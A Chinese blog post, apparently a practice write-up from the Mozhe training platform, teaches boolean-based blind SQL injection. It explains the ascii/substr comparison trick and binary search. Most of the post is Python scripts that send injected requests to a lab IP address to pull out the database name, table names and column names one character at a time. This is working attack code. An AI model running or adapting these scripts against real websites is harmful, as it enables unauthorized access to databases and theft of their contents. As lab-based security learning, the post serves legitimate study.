SQL手工注入知识回顾(二)
还是墨者的平台,还是熟悉的平台,这次是布尔盲注,上一个实验,我们可以直接从页面返回信息中看到我们想要的数据。
下面分别是上次和这次的截图,可以看到我们已经无法将查询信息显示在页面上了
那要如何确定我们想知道的数据呢,这里可以用到布尔盲注,布尔盲注是通过判断页面返回true还是false来判断。
id=1 and ascii(substr(database(),1,1))>33
substr(database(),1,1)这里是截取database()的返回值,从第1位开始,截取1位,然后判断这一位的ascii值,如果>33,那么如果and后这个判断为真,则页面会正常返回,如果这一位的ascii值小于等于33,则and前为真,后为假,页面不会正常返回,这里也可以用等于来进行判断,只不过等于的话,只能一个个试,而大于小于的话可以用二分法来加速。
如果想确定数据库名,那么可以先用length(database())来确定数据库名的长度,然后再用ascii()来确定每一位的具体值,表名什么的原理也是一样的。
手工的话比较慢,用Python脚本快一些。
--------------------------------------------------------------------------------------------------------------------------
import requests
#获取数据库名
def database_len():#获取数据库名的长度
for i in range(1,100):
url = "http://219.153.49.228:48414/new_list.php?id=1 and length(database())>{}".format(i)
r = requests.get(url+'%23')
if '2018' not in r.text:
print('database_length:',i)
return i
def database_name():#利用判断ASCII值的方式,确定数据库名的每一位的ASCII值
name = ''
for j in range(1,database_len()+1):
for i in range(33,127):
url = "http://219.153.49.228:48414/new_list.php?id=1 and ascii(substr(database(),{},1))={}".format(j,i)
r = requests.get(url+'%23')
if '2018' in r.text:
name = name+chr(i)
break
print('database_name:',name)
database_name()
--------------------------------------------------------------------------------------------------------------------
import requests
DatabaseName=input('请输入数据库名:')
def table_number():
limitnumber=0
for n in range(1,100):
url = "http://219.153.49.228:48414/new_list.php?id=1 and (select length(table_name) from information_schema.tables where table_schema='{}' limit {},1)>0".format(DatabaseName,limitnumber)
r = requests.get(url+'%23')
if '2018' in r.text:
limitnumber=limitnumber+1
else:
print("数据库",DatabaseName,"中有",n-1,"个表")
break
table_number()
---------------------------------------------------------------------------------------------------------------------
获取数据库表名
import requests
DatabaseName='stormgroup' #数据库名
TableNumber=2 #表的个数
log_tablelen=[] #定义一个全局变量列表用来存储表名的长度
def log_table_len(a):
global log_tablelen
log_tablelen.append(a)
def table_len():
for i in range(1,TableNumber+1):
for j in range(0,100):
url = "http://219.153.49.228:48414/new_list.php?id=1 and (select length(table_name) from information_schema.tables where table_schema='{}' limit {},1)>{}".format(DatabaseName,i-1,j)
r = requests.get(url+'%23')
if '2018' not in r.text:
print('第',i,'个表的长度为',j)
log_table_len(j)
break
def table_name():
for i in range(1,TableNumber+1):
tablename=''
for j in range(1,log_tablelen[i-1]+1):
for k in range(33,127):
url = "http://219.153.49.228:48414/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='{}' limit {},1),{},1))={}".format(DatabaseName,i-1,j,k)
r = requests.get(url+'%23')
if '2018' in r.text:
tablename = tablename+chr(k)
break
print('第',i,'个表的name为',tablename)
table_len()
table_name()
-------------------------------------------------------------------------------------------------------------
获取column名称
import requests
log_databasename='stormgroup'
log_tablenumber=2
log_tablename=['member','notice']
log_columnnumber=[]
def log_column_number(a):
global log_columnnumber
log_columnnumber.append(a)
def column_number():
DatabaseName=log_databasename
for i in range(1,log_tablenumber+1):
TableName=log_tablename[i-1]
limitnumber=0
for n in range(1,100):
url = "http://219.153.49.228:44313//new_list.php?id=1 and (select length(column_name) from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1)>0".format(DatabaseName,TableName,limitnumber)
r = requests.get(url+'%23')
if '2018' in r.text:
limitnumber=limitnumber+1
else:
print("表",TableName,"中有",n-1,"个列")
log_column_number(n-1)
break
def column_name_len():
DatabaseName=log_databasename
for i in range(1,log_tablenumber+1):
TableName=log_tablename[i-1]
for j in range(1,log_columnnumber[i-1]+1):
for k in range(0,100):
url = "http://219.153.49.228:44313//new_list.php?id=1 and (select length(column_name) from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1)>{}".format(DatabaseName,TableName,j-1,k)
r = requests.get(url+'%23')
if '2018' not in r.text:
print(TableName,'的第',j,'个列为的长度为',k)
log_column_len(k)
break
log_columnlen=[]
def log_column_len(a):
global log_columnlen
log_columnlen.append(a)
log_columnname=[]
def log_column_name(a):
global log_columnname
log_columnname.append(a)
def column_name():
NO=0
DatabaseName=log_databasename
for i in range(1,log_tablenumber+1):
TableName=log_tablename[i-1]
for j in range(1,log_columnnumber[i-1]+1):
columnname=''
for k in range(1,log_columnlen[NO]+1):
for l in range(33,127):
url = "http://219.153.49.228:44313//new_list.php?id=1 and ascii(substr((select column_name from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1),{},1))={}".format(DatabaseName,TableName,j-1,k,l)
r = requests.get(url+'%23')
if '2018' in r.text:
columnname = columnname+chr(l)
print(TableName,'的第',j,'个列的名称为',columnname)
break
log_column_name(columnname)
NO=NO+1
column_number()
column_name_len()
column_name()
查询具体数据的代码我还没写,写完之后再贴上来
浙公网安备 33010602011771号